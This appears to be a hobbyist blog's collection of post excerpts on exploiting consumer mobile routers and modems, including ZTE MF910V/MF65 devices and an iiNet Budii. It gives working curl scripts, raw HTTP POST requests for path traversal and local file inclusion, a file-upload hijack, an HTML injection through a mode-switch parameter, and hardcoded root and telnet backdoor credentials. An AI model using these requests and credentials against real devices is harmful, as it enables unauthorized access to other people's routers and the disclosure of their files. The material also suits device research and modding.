Franks Electric Dreams

 Telstra ZteMF910/v Exploit Scripts To utilize the exploits on the ZTE MF910V router, we will create a set of scripts in bash and HTML. These scripts will allow us to perform mode switching, enable ADB, execute AT commands, enable debug mode, exploit LFI, and gain root access. Let's go through each exploit and the corresponding scripts required. Mode Switching and Enabling ADB To perform mode switching and enable ADB on the ZTE MF910V router, we need to send HTTP requests to specific endpoints. We can achieve this using a bash script. Here's an example: language-bash #!/bin/bash # Mode Switching MODE_SWITCH_URL= "http://192.168.0.1/goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X" MODE_SWITCH_VALUE= "1" # Change X to 0 or 1 curl -s -X POST -d "goformId=SET_DEVICE_MODE&debug_enable= $MODE_SWITCH_VALUE " $MODE_SWITCH_URL # Enabling ADB ADB_ENABLE_URL= "http://192.168.0.1/goform/goform_set_cmd_pr...

ZTE MF910/ZTE910B/ZTE MF910V/Telstra MF910v  This guide exists in both linux and windows format Please follow the instructions as per O/S or untill instructions converge |+++++++++++++++++++++++++++++++++++++| Default credentials: For ZTE MF910/ZTE910B/ZTE MF910V/Telstra MF910v root:oelinux123 Web Interface Password: password |+++++++++++++++++++++++++++++++++++++| Getting Setup: Download the mode switch html to run locally: http://lopoteam.com/3AY9 Also ensure you have ADB (Android Debug Bridge) installed on your computer: ADB: Linux: https://dl.google.com/android/repository/platform-tools-latest-linux.zip http://lopoteam.com/37Bw Windows: https://dl.google.com/android/repository/platform-tools-latest-windows.zip http://lopoteam.com/37Ac |+++++++++++++++++++++++++++++++++++++| Lets Begin |+++++++++++++++++++++++++++++++++++++| Plug your device into the computer to download drivers. Linux: Open Terminal cd ...

ZTE MF910V Mode Switch / ADB Enable / AT Commands / Debug AT mode : /goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X Change X to either 0 or 1 this enables and disables qualcomm services, Debub / Adb :  /goform/goform_set_cmd_process?goformId=USB_MODE_SWITCH&usb_mode=X Change X to be the value matching the desired mode. 1-4 is RNDIS 5 is CDC 6 is ADB. or this page is uploaded to any web dir: UPDATED(2017) Download this file: tools.html Upload it to any directory and use it to switch thru modes via html

ZTE MF910V LFI : HTTPshare exploit Telstra MF910V: passwords are base64(encode) The Config file has the sd card function turned off in the basic state SD_CARD_SUPPORT: true or false mf910v SD_BASE_PATH: / from mf65 /*** SD 卡根目录 @attribute  {String} SD_BASE_PATH */ SD_BASE_PATH: '/mmc2', change to '/' menus relating to httpshare are stripped out (webs)/js/config/menu.js in this file the following functions are commmented out #httpshare_guest #sd (sets the menu item up again) #sdcard(settings part for sd card menu) #httpshare(file viewer for sd card menu) by un commenting these we can enable the sdcard function again we need to change the pre path in the httpshare.js file we will change this to '/mmc2' /** * 前置路径，发现有的设备会将sd卡数据显示在web目录 *  @attribute  {String} prePath *  @example * prePath = "/usr/zte/zte_conf/web"; */ var prePath = "/mmc2";// "/usr/zte/zte_conf/web"; then use the commands...

///ZTE mf65 Mode Switch/// this page is uploaded to any web dir: UPDATED(2017) Download this file: mode.html Upload it to any directory and use it to switch thru modes via html Modes: factory_mode">Download Mode(DIAG+AT+MODEM) debug_mode">Debug Mode(RNDIS+DIAG+AT+MODEM) work_mode">Work Mode(RNDIS)  1. After you have selected and applyed the switch, check the page title for status, then refresh! To return to default mode Send AT+ZCDRUN=9 Then AT+ZCDRUN=F to COM(X) ZTE NMEA Device

///////ZTE MF65 -- Unlocking A Few More features (Fastboot) /mf65_efs/Secondary/web/js/config/ufi/mf65/menu.js  or /js/config/ufi/mf65/menu.js By changing the file that controls the menus we can enable/disable a few more options like: ((#phonebook)) #group_common #group_family #group_friend #group_colleague ((#status))  #STK #traffic_alert  #USSD ((#Wifi_setting)) #ap_station ((#device_setting)) #update_management #dlna_setting #fastboot ((#firewall )) #port_filter #port_forward #port_map #system_security #dmz #upnp we simply remove the commenting out and re upload the file and this will enable any function that has been left out; use/see previous methods for ways to do this if unsure [extra note] this file can also be used to disable the httpshare for guests this file can be used to either strengthen or weaken a routers structure and presentation to anyone able to access ...

iiNet Budii(1031) (Telnet Access) so telnet was always another open port available to us from the network, although it never responded to any login attempts even if we 100% knew the password and user was correct; This was solvable by one of two approaches. (1) The easiest by far was to simply grab the consumer release of the firmware, inside its folders is a compilable c file for telnet (they've named it telnetc) Budii1016_consumer_release/bcm963xx_4.12L.01_consumer /userspace/gpl/apps/telnetc  this is a pretty basic busybox telnet file a few modifications have been made over the years  one includes this little function     telnet_data_set_autheninfo(&g_telnet_data, "iismshamswii", "i20U18r4E3");     addr.s_addr = inet_addr("10.1.1.1");     telnet_data_set_serverinfo(&g_telnet_data, &addr, 23); meaning that iismshamswii will work as the username with i20U18r4E3 as the password ...

In the last mf65 post  we covered the local file listing method  and briefly touched on the changes to the config file  for constant file listing for the sd card functions i managed to soft brick my device by directory transversal on the sd card base path basically the router would try and load the httpshare page, get to the share path and sd base path, ultimately just reading /mmc2/../ and it would just freak out and not load so it sat around for a while. Now im back and have a solution that,  fixes my problem and gives us access to the internal files we will need a windows machine (xp++)  QPST, the modem drivers and putty  (ZTE WCDMA technologies MSM issue ??) (if you cannot find the drivers keep looking they are around try dcunlocker support files(i had to try several drivers before my machine acknowledged them)) using :   /goform/goform_process?goformId=MODE_SWITCH&switchCmd=FACTORY ...

This is a method to list the local files on the router via wftp (USBwebsever) : Requires login and usb inserted into the aux usbports(fat/nfts)(*1) Either goto:   http://10.1.1.1/usb_wftp_server.html       Or  http://10.1.1.1/websrv_cfg.cmd?action=save&wftp_enable=1&wftp_remote=0&port=8000&path=*&partitionindex=1&disk_index=0&disk_name=sdb (you may need to use Ui to turn this on)  To turn on the fileserver, now point your browser here:        http://10.1.1.1/usb_wftp_tree.cmd?diskname=..%2f..%2f    (notice the URLencode because the straight transversal is rejected by the websever not even making its way to the app  but with encoded slashes we beat the checks)   and click save  now we goto: http://10.1.1.1:8000  And we see our routers internal files. we can wget out a copy of the systems memory with ...

Opening the case we find a internal usb, we can also see a altera max jtag breakout, a large set of gpio pins and a UART breakout. connecting to the uart and booting we can see the modem is running a broadcom firmware  [bootlog.samp] CFE version 1.0.38-112.118 for BCM96362 (32bit,SP,BE) Build Date: Fri Dec 6 11:09:42 CST 2013 (root@Ayecom) Copyright (C) 2000-2011 Broadcom Corporation.  ** Chip ID: BCM6362B0, MIPS: 400MHz, DDR: 333MHz, Bus: 166MHz  ** Total Memory: 134217728 bytes (128MB) Default host run file name : vmlinux Default host flash file name : bcm963xx_fs_kernel [/bootlog.samp] the user names available to us are: (user:admin/password:admin) (user:user/password:user)    upon logging in we are brought into a console(d), the commands available to admin are : [?.samp] help      ...

/////ZTE MF65 -- local file listing method 3(LFLM )The Full Package ///// another super quick one for a even better listing in the web application with the ability to change your path via the sd card settings, we use the exploit from last time to gain a web app access to the web folder, this time though we have a little bit more work to do, so here we go from the start : POST /goform/goform_set_cmd_process HTTP/1.1 Host: 192.168.0.1 isTest=false&goformId=HTTPSHARE_AUTH_SET &HTTP_SHARE_STATUS=Enabled &HTTP_SHARE_WR_AUTH=readWrite &HTTP_SHARE_FILE=..%2Fweb%2F using the HTTP_SHARE_FILE= param we can change the displayed folders in the sd card manager, you will need to be logged in for this method. so your work flow is: login send request to change path  logout use the httpguest button to see the files now we will navigate to web/js/config/ then we will download the config.js file and change the line :  SD_BASE_PATH: /mmc2/ to ...

another super quick one for a better listing in the web application POST /goform/goform_set_cmd_process HTTP/1.1 Host: 192.168.0.1 isTest=false&goformId=HTTPSHARE_AUTH_SET &HTTP_SHARE_STATUS=Enabled &HTTP_SHARE_WR_AUTH=readWrite &HTTP_SHARE_FILE=..%2Fweb%2F using the HTTP_SHARE_FILE= param we can change the displayed folders in the sd card manager, you will need to be logged in for this method. so your work flow is: login send request to change path  logout use the httpguest button to see the files this can be used to include files, delete, create and rename files/folders. this is method requires login but other methods can work without a login. till next time :) FrankSxx

  ##  File Upload/Exec LFI ## hey new one, demonstration of web server executable includes use post to send off this file, this file has our basic index re uploaded without the service providers logo use hijack.html to load the new file, it may fail it also may say it was a success without actually working use with the lister bash script to check the /webs folder POST /cgi-bin/web/Hijack.html HTTP/1.1 Host: Your IP Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Content-Type: multipart/form-data; boundary=---------------------------13738844281409151800268458935 Content-Length: 10299 -----------------------------13738844281409151800268458935 Content-Disposition: form-data; name="path_SD_CARD_time" 2016-06-12 04:28:43 -----------------------------13738844281409151800268458935 Content-Disposition: form-data; name="path_SD_CARD_time_unix" 1465705724 ----...

quick upload: these have (your.local.ip) change to suit yours bash script for file listings: ################################### #!/bin/sh echo "use ^c to exit" echo "path" read PARAM1 echo "page\(please use 1 as default\(10 r/s per page\)\)" read PARAM2 echo '     ' HOST_PARAM="http://your.local.ip/goform/goform_set_cmd_process?isTest=false&goformId=HTTPSHARE_ENTERFOLD&path_SD_CARD="$PARAM1"&indexPage=$PARAM2" curl "$HOST_PARAM" echo '     ' echo "New Page Number? or 0 to go back." read PARAM3 HOST_PARAM="http://your.local.ip/goform/goform_set_cmd_process?isTest=false&goformId=HTTPSHARE_ENTERFOLD&path_SD_CARD="$PARAM1"&indexPage=$PARAM3"     curl "$HOST_PARAM"     echo ' ' echo "use ^c to exit" echo "path" read PARAM1 echo "page\(please use 1 as default\(10 r/s per page\)\)...

///Zte MF65 local file listing/include exploits/// hey guys back again and another quickie but goodie, ive been searching for any traces of the internal filesystem of this router by every method of lfi i could think of, i was lured to the http share page, this is the page used to upload files into the sd card, it seems to be locked to the mmc2 path, via the requests made, the paths are set in the httpshare files (off the top of my head they are in the tmpl/sd path and in the js path) the htttp page uses a directory check to obtain a listing of the files in the said directory(mmc2) by changing the check querys we end up with a few local file listing includes and a few local file includes: we are using xml reqeusts via your favourite request launcher (nc,curl,burp,whatevs) using: POST /goform/goform_set_cmd_process HTTP/1.1 Host: 192.165.0.1 User-Agent: your own uA  Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding...

ZTE (telstra) MF65 Remote file include : this exploit uses : http:// Your-R-IP /goform/goform_process?goformId=MODE_SWITCH&switchCmd= and exploits the loose handling of closing html tags because the switchCmd  page  uses a unclosed <title> tag to normally write the switch command and return either success or fail in the page title, this leads us to closing the <tiltle> and starting a new tag, i found <xyz> worked as an arbitrary tag  , this worked great(you could use anything in there), so we have :   switchCmd=pagenamegoeshere</title><xyz> and using the img tag and span tags we get <img border=0 width=300 height=200 src="https://www.google.com.au/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png"alt="some crap goes here" v:shapes="and here as well"><span><p><a href="http://google.com" target="_blank"><span class="index_toplink">this w...